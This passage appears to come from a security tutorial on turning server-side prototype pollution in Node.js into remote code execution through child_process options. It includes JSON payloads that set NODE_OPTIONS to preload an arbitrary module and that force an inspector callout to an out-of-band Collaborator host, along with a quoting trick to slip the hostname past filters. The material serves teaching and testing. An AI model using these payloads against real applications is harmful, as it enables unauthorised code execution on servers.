RCE via Vulnerable Requests

There are a number of potential command execution sinks in Node, many of which live in the child_process module. The most reliable way to find out which of these sinks a polluted property actually reaches is to pollute the prototype with a payload that triggers an interaction with Burp Collaborator when the sink is called, rather than trying to guess from the response.

The NODE_OPTIONS environment variable lets you define a string of command-line arguments that Node applies by default whenever a new Node process starts. child_process takes the child's environment from the env property of the options object it is given, and because property lookups fall through to the prototype chain, you can potentially control this via prototype pollution whenever the application does not set env itself. The --require flag is the useful option here: it preloads a module of your choosing before the child's own code runs.

"__proto__": {
    "env": {
        "NODE_OPTIONS": "--require /tmp/malicious.js"
    }
}

Some of Node's functions for creating new child processes accept an optional shell property. It is meant for naming a shell such as /bin/bash, but any string is accepted: on POSIX the command is launched as <shell> -c <command>, so polluting shell with node makes the sink start node -c <command>, and node parses NODE_OPTIONS before it gets anywhere near that command. Combined with a polluted NODE_OPTIONS carrying --inspect, every child process the application spawns triggers a Collaborator interaction when the inspector tries to bind to the supplied hostname:

"__proto__": {
    "shell": "node",
    "NODE_OPTIONS": "--inspect=YOUR-COLLABORATOR-ID.oastify\"\".com"
}

Note that NODE_OPTIONS sits directly on the prototype here rather than under env. When the application passes no env, child_process copies process.env into the child with a for...in loop, which enumerates inherited properties, so the polluted value becomes a real environment variable in the child. The escaped empty string survives JSON decoding as "" inside the hostname; Node's NODE_OPTIONS tokeniser strips bare double quotes when it splits the value, so the child still resolves the plain Collaborator hostname.
